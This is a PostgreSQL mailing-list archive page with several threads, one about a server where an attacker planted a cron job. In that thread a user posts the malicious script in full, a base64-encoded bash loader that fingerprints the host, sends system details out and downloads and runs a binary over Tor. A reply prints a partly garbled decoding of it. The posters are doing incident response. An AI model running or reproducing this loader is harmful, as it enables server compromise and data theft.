Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Julien Rouhaud
On Mon, Jan 02, 2023 at 08:53:32AM +0200, Antonis Christodoulou wrote:
> And for the record, Ahmet, here’s a weird cron job:
> christan@vultr:~$ sudo crontab -l -u postgres
> 13 * * * * 
> /var/lib/postgresql/ > 
> /dev/null 2>&1 &
> Had no idea somebody can add something like this externally...

Just to be clear, having a superuser connection is basically the same as having
a shell open on the server running with the postgres (or the OS user running
the postgres service) user.  If your postgres OS user is a member of the cron
group it can add its own entry easily, the rest being stored in a
postgres-owned directory.

Re: Exact same output - pg_stat_statements

2023-01-02 Thread Julien Rouhaud
On Mon, Jan 02, 2023 at 02:34:13PM +0100, hubert depesz lubaczewski wrote:
> On Fri, Dec 30, 2022 at 11:04:59AM -0500, Rushikesh socha wrote:
> > Hi, Whenever I am running the below query on one of my Azure PostgreSQL
> > PaaS instances I am getting exact same output. I feel it shows old
> > information but as far as i know pg_stat_statements only shows current
> > information and not past right ? It may be a bug?
> pg_stat_statements has all the data since last reset of stats.
> So if you never reset stats, it accumulated data for howeve rlong you
> are using pg.
> Not really surprising that top total-time uses are the same.
> If you want to sensibly use it you should call reset function every now
> and then.

Resetting the data adds some noticeable overhead as newly added entries will
need to generate a normalize query string and so on.  What most people do is
taking regular snapshots of pg_stat_statements (and other stats) view and then
compare the snapshots.  There are a few open source projects doing that

Re: what kind of hash algorithm is used by hash_bytes()?

2023-01-02 Thread Julien Rouhaud

On Tue, Jan 03, 2023 at 12:30:27AM +0800, wrote:
> --
> I can't understand the hash_bytes() func in 
> src/backend/access/hash/hashfunc.c, it's published by a paper or others?
> Can you give me some materials to study it in depth?

It's documented at the beginning of hashfn.c.

Re: what kind of hash algorithm is used by hash_bytes()?

2023-01-02 Thread Adrian Klaver

On 1/2/23 08:30, wrote:
I can't understand the hash_bytes() func in src/backend/access/hash/hashfunc.c, 
it's published by a paper or others?
Can you give me some materials to study it in depth?

Check out the README in:


Adrian Klaver

what kind of hash algorithm is used by hash_bytes()?

2023-01-02 Thread
I can't understand the hash_bytes() func in src/backend/access/hash/hashfunc.c, 
it's published by a paper or others?
Can you give me some materials to study it in depth?

Re: Exact same output - pg_stat_statements

2023-01-02 Thread hubert depesz lubaczewski
On Fri, Dec 30, 2022 at 11:04:59AM -0500, Rushikesh socha wrote:
> Hi, Whenever I am running the below query on one of my Azure PostgreSQL
> PaaS instances I am getting exact same output. I feel it shows old
> information but as far as i know pg_stat_statements only shows current
> information and not past right ? It may be a bug?

pg_stat_statements has all the data since last reset of stats.

So if you never reset stats, it accumulated data for howeve rlong you
are using pg.

Not really surprising that top total-time uses are the same.

If you want to sensibly use it you should call reset function every now
and then.
Best regards,


Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Matthias Apitz
El día Montag, Januar 02, 2023 a las 11:54:53 +0300, Ebubekir Büyüktosun 

>Hey Antonis,
>If you decode the below Base64 code, you will see the following bash
>script that is tried to execute on your machine;
> ...

Without analyzing the shell code in detail, this is clear evidence of an
attack. You must purge the full operating system and reinstall it from
scratch with better credentials of Linux and later PostgreSQL.

Matthias Apitz, ✉, +49-176-38902045
Public GnuPG key:

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Ebubekir Büyüktosun
Hey Antonis, If you decode the below Base64 code, you will see the following bash script that is tried to execute on your machine; x8C8W8llVk0Rzccy9N0ggCOI2VBAcexec &>/dev/nullexport PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)c=$(echo "curl -4fsSLkA- -m200")t=$(echo "4iucigxvlfx4vcqn5sordersaa3a3ztjcaoszptxxo5b3pbn6nlwsfad") sockz() {n=($(echo "dns-query?")q=${n[$((RANDOM%${#n[@]}))]}s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)} fexe() {for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done} u() {sockzf=/int.$(uname -m)x=./$(date|md5sum|cut -f1 -d-)r=$(curl -4fsSLk||curl -4fsSLk$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$rchmod +x $x;$x;rm -f $x} for h in tor2web.itdoif ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; thenfexe;u $t.$hls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)elsebreakfidone 02.01.2023, 11:37, "Antonis Christodoulou" :Hey Matthias, here it is: christan@vultr:~$ sudo cat /var/lib/postgresql/!/bin/bashexec &>/dev/nullecho x8C8W8llVk0Rzccy9N0ggCOI2VBAcecho eDhDOFc4bGxWazBSemNjeTlOMGdnQ09JMlZCQWMKZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDokSE9NRTovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3dkfGN1dCAtZDogLWY2KQpjPSQoZWNobyAiY3VybCAtNGZzU0xrQS0gLW0yMDAiKQp0PSQoZWNobyAiNGl1Y2lneHZsZng0dmNxbjVzb3JkZXJzYWEzYTN6dGpjYW9zenB0eHhvNWIzcGJuNm5sd3NmYWQiKQoKc29ja3ooKSB7Cm49KGRucy50d25pYy50dyBkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYWhkbnMuY29tIGRvaC1maS5ibGFoZG5zLmNvbSBkb2gtanAuYmxhaGRucy5jb20gZG9oLmxpIGRvaC5wdWIgZG9oLXNnLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmRpZ2l0YWxzaXplLm5ldCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnE9JHtuWyQoKFJBTkRPTSUkeyNuW0BdfSkpXX0Kcz0kKCRjIGh0dHBzOi8vJHEvJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8dGFpbCAtMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash On 2 Jan 2023, at 9:46 AM, Matthias Apitz  wrote: El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou escribió: And for the record, Ahmet, here’s a weird cron job:christan@vultr:~$ sudo crontab -l -u postgres13 * * * * /var/lib/postgresql/ > /dev/null 2>&1 &Had no idea somebody can add something like this externally...Please post the content of this script.matthias--Matthias Apitz, ✉, +49-176-38902045Public GnuPG key:   İyi çalışmalar Best Regards  

Re: PostgreSQL 12 service failing in Ubuntu 20.04 after a few hours

2023-01-02 Thread Antonis Christodoulou
Hey Matthias, here it is:

christan@vultr:~$ sudo cat 
exec &>/dev/null
echo x8C8W8llVk0Rzccy9N0ggCOI2VBAc

> On 2 Jan 2023, at 9:46 AM, Matthias Apitz  wrote:
> El día lunes, enero 02, 2023 a las 08:53:32a. m. +0200, Antonis Christodoulou 
> escribió:
>> And for the record, Ahmet, here’s a weird cron job:
>> christan@vultr:~$ sudo crontab -l -u postgres
>> 13 * * * * 
>> /var/lib/postgresql/ > 
>> /dev/null 2>&1 &
>> Had no idea somebody can add something like this externally...
> Please post the content of this script.
>   matthias
> -- 
> Matthias Apitz, ✉, +49-176-38902045
> Public GnuPG key: